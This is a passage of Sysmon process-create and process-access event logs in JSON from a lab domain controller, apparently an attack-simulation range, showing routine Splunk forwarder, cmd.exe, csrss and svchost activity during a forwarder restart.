Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.750\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.750","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.766\r\nProcessGuid: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nProcessId: 4372\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.766","ProcessGuid":"{41C8662E-1FF2-5F25-0000-0010D3470500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-0010D3470500}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-0010D3470500}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 